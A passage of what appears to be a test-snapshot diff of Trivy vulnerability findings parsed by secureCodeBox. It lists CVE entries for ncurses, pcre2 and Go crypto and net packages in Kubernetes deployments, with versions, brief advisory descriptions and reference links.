"https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", - ], - }, - "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", + "value": "https://github.com/prometheus/client_golang/pull/987", }, { "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", + "value": "https://github.com/prometheus/client_golang/releases/tag/v1.11.1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", + "value": "https://github.com/prometheus/client_golang/security/advisories/GHSA-cg3q-j54f-5p7p", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "value": "https://linux.oracle.com/cve/CVE-2022-21698.html", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "value": "https://linux.oracle.com/errata/ELSA-2022-8057.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2IK53GWZ475OQ6ENABKMJMTOBZG6LXUR/", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2PFW6Q2LXXWTFRTMTRN4ZGADFRQPKJ3D/", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/36GUEPA5TPSC57DZTPYPBL6T7UPQ2FRH/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3L6GDN5S5QZSCFKWD3GKL2RDZQ6B4UWA/", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4KDETHL5XCT6RZN2BBNOCEXRZ2W3SFU3/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5OGNAFVXSMTTT2UPH6CS3IH6L3KM42Q7/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/7V7I72LSQ3IET3QJR6QPAVGJZ4CBDLN5/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AK7CJBCGERCRXYUR2EWDSSDVAQMTAZGX/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "libncurses6", - "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", - ], - }, - "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FY3N7H6VSDZM37B4SKM2PFFCUWU7QYWN/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HLAQRRGNSO5MYCPAXGPH2OCSHOGHSQMQ/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KBMVIQFKQDSSTHVVJWJ4QH6TW3JVB7XZ/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MH6ALXEQXIFQRQFNJ5Y2MJ5DFPIX76VN/", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RN7JGC2LVHPEGSJYODFUV5FEKPBVG4D7/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SASRKYHT5ZFSVMJUQUG3UAEQRJYGJKAR/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZKORFJTRRDJCWBTJPISKKCVMMMJBIRLG/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-21698", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://pkg.go.dev/vuln/GO-2022-0322", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-21698", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "6.2+20201114-2+deb11u1", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-29458", - "installedVersion": "6.2+20201114-2", - "packageName": "libncursesw6", + "fixedVersion": "0.0.0-20211202192323-5770296d904e", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-43565", + "installedVersion": "v0.0.0-20201216223049-8b5274cf687f", + "packageName": "golang.org/x/crypto", "references": [ - "http://seclists.org/fulldisclosure/2022/Oct/41", - "https://access.redhat.com/security/cve/CVE-2022-29458", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", - "https://invisible-island.net/ncurses/NEWS.html#t20220416", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", - "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", - "https://support.apple.com/kb/HT213488", - "https://ubuntu.com/security/notices/USN-5477-1", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "https://access.redhat.com/security/cve/CVE-2021-43565", + "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", + "https://go.dev/cl/368814/", + "https://go.dev/issues/49932", + "https://groups.google.com/forum/#!forum/golang-announce", + "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", + "https://pkg.go.dev/vuln/GO-2022-0968", + "https://www.cve.org/CVERecord?id=CVE-2021-43565", ], }, "category": "Vulnerability", - "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "The x/crypto/ssh package before 0.0.0-20211202192323-5770296d904e of golang.org/x/crypto allows an attacker to panic an SSH server.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "ncurses: segfaulting OOB read", + "name": "golang.org/x/crypto: empty plaintext packet causes panic", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29458", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/Oct/41", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29458", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "value": "https://avd.aquasec.com/nvd/cve-2021-43565", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "value": "https://access.redhat.com/security/cve/CVE-2021-43565", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "value": "https://github.com/advisories/GHSA-gwc9-m7rh-j2ww", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "value": "https://go.dev/cl/368814/", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "value": "https://go.dev/issues/49932", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "value": "https://groups.google.com/forum/#!forum/golang-announce", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://groups.google.com/g/golang-announce/c/2AR1sKiM-Qs", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5477-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43565", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://pkg.go.dev/vuln/GO-2022-0968", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43565", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29491", - "installedVersion": "6.2+20201114-2", - "packageName": "libncursesw6", + "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27191", + "installedVersion": "v0.0.0-20201216223049-8b5274cf687f", + "packageName": "golang.org/x/crypto", "references": [ - "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", - "http://www.openwall.com/lists/oss-security/2023/04/19/10", - "http://www.openwall.com/lists/oss-security/2023/04/19/11", - "https://access.redhat.com/security/cve/CVE-2023-29491", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", - "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", - "https://security.netapp.com/advisory/ntap-20230517-0009/", - "https://ubuntu.com/security/notices/USN-6099-1", - "https://www.cve.org/CVERecord?id=CVE-2023-29491", - "https://www.openwall.com/lists/oss-security/2023/04/12/5", - "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "https://access.redhat.com/errata/RHSA-2022:8008", + "https://access.redhat.com/security/cve/CVE-2022-27191", + "https://bugzilla.redhat.com/1939485", + "https://bugzilla.redhat.com/1989564", + "https://bugzilla.redhat.com/1989570", + "https://bugzilla.redhat.com/1989575", + "https://bugzilla.redhat.com/2064702", + "https://bugzilla.redhat.com/2121445", + "https://bugzilla.redhat.com/2121453", + "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "https://go.dev/cl/392355", + "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "https://linux.oracle.com/cve/CVE-2022-27191.html", + "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "https://pkg.go.dev/vuln/GO-2021-0356", + "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "https://security.netapp.com/advisory/ntap-20220429-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-27191", ], }, "category": "Vulnerability", - "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "Local users can trigger security-relevant memory corruption via malformed data", + "name": "crash in a golang.org/x/crypto/ssh server", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-29491", - }, - { - "type": "URL", - "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "value": "https://avd.aquasec.com/nvd/cve-2022-27191", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "value": "https://access.redhat.com/errata/RHSA-2022:8008", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "value": "https://access.redhat.com/security/cve/CVE-2022-27191", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-29491", + "value": "https://bugzilla.redhat.com/1939485", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "value": "https://bugzilla.redhat.com/1989564", }, { "type": "URL", - "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "value": "https://bugzilla.redhat.com/1989570", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "value": "https://bugzilla.redhat.com/1989575", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", + "value": "https://bugzilla.redhat.com/2064702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6099-1", + "value": "https://bugzilla.redhat.com/2121445", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "value": "https://bugzilla.redhat.com/2121453", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", + "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1586", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:5809", - "https://access.redhat.com/security/cve/CVE-2022-1586", - "https://bugzilla.redhat.com/2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", - "https://errata.almalinux.org/8/ALSA-2022-5809.html", - "https://errata.rockylinux.org/RLSA-2022:5809", - "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", - "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", - "https://linux.oracle.com/cve/CVE-2022-1586.html", - "https://linux.oracle.com/errata/ELSA-2022-5809.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1586", - ], - }, - "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the compile_xclass_matchingpath() function of the pcre2_jit_compile.c file. This involves a unicode property matching issue in JIT-compiled regular expressions. The issue occurs because the character was not fully read in case-less matching within JIT.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in compile_xclass_matchingpath in pcre2_jit_compile.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1586", + "value": "https://go.dev/cl/392355", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5809", + "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1586", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2077976", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976", + "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077976,", + "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1586", + "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5809.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5809", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/50a51cb7e67268e6ad417eb07c9de9bfea5cc55a,", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", }, { "type": "URL", - "value": "https://github.com/PCRE2Project/pcre2/commit/d4fa336fbcc388f89095b184ba6d99422cfc676c", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1586.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5809.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1586", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221028-0009/", + "value": "https://pkg.go.dev/vuln/GO-2021-0356", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-1", + "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5627-2", + "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1586", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "10.36-2+deb11u1", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1587", - "installedVersion": "10.36-2", - "packageName": "libpcre2-8-0", + "fixedVersion": "0.0.0-20210520170846-37e1c6afe023", + "foundIn": "Target: 'usr/local/bin/local-path-provisioner' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-33194", + "installedVersion": "v0.0.0-20201021035429-f5854403a974", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-1587", - "https://bugzilla.redhat.com/show_bug.cgi?id=2077983,", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1587", - "https://github.com/PCRE2Project/pcre2/commit/03654e751e7f0700693526b67dfcadda6b42c9d0", - "https://linux.oracle.com/cve/CVE-2022-1587.html", - "https://linux.oracle.com/errata/ELSA-2022-5251.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00014.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DWNG2NS3GINO6LQYUVC4BZLUQPJ3DYHA/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXINO3KKI5DICQ45E2FKD6MKVMGJLEKJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KAX7767BCUFC7JMDGP7GOQ5GIZCAUGBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M2GLQQUEY5VFM57CFYXVIFOXN2HUZPDM/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1587", - "https://security.netapp.com/advisory/ntap-20221028-0009/", - "https://ubuntu.com/security/notices/USN-5627-1", - "https://ubuntu.com/security/notices/USN-5627-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1587", + "https://access.redhat.com/security/cve/CVE-2021-33194", + "https://github.com/advisories/GHSA-83g2-8m93-v3w7", + "https://github.com/golang/net/commit/37e1c6afe02340126705deced573a85ab75209d7", + "https://go.dev/cl/311090", + "https://go.dev/issue/46288", + "https://go.googlesource.com/net/+/37e1c6afe02340126705deced573a85ab75209d7", + "https://groups.google.com/g/golang-announce/c/wPunbCPkWUg", + "https://groups.google.com/g/golang-dev/c/28x0nthP-c8/m/KqWVTjsnBAAJ", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4CHKSFMHZVOBCZSSVRE3UEYNKARTBMTM/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-33194", + "https://pkg.go.dev/vuln/GO-2021-0238", + "https://www.cve.org/CVERecord?id=CVE-2021-33194", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read vulnerability was discovered in the PCRE2 library in the get_recurse_data_length() function of the pcre2_jit_compile.c file. This issue affects recursions in JIT-compiled regular expressions caused by duplicate data transfers.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "description": "golang.org/x/net before v0.0.0-20210520170846-37e1c6afe023 allows attackers to cause a denial of service (infinite loop) via crafted ParseFragment input.", + "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", "mitigation": undefined, - "name": "pcre2: Out-of-bounds read in get_recurse_data_length in pcre2_jit_compile.c", + "name": "golang: x/net/html: infinite loop in ParseFragment", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1587", - }, - { - "type": "URL", - "value": 